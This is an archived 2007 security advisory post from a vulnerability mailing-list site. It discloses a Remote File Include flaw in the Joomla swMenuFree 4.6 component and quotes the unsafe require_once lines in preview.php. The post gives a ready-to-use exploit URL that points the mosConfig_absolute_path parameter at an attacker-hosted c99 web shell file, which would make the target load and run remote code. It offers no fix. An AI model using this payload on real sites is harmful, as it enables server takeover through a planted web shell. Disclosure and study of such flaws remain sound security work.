Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Simple Forum (for WordPress) sql-inject exploit (public version)

  Simple Forum (for WordPress) sql-inject exploit (public version)

  Several vulnerabilities in CMS Made Simple 1.1.3.1

  wmtrssreader joomla component 1.0 Remote File Include Vulnerability

From:Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:12.10.2007
Subject:Joomla! swMenuFree 4.6 Component Remote File Include

#Joomla! swMenuFree 4.6 Component Remote File Include
#Found by 0x90
#WwW.0x90.CoM.Ar
#Download: http://www.swmenupro.com/index.php?option=com_remository&Itemid=298&func=
fileinfo&id=12

#dork: No dork for script kiddies.. :)
#BUG:

preview.php:12: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/styles.php"); // <--
RFI
preview.php:13: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/functions.php"); //
<-- RFI

#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_absolute_path
=http
://scriptkiddie.com/c99haxor.txt?

#Contact: Guns [at] 0x90 [dot] com [dot] ar

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server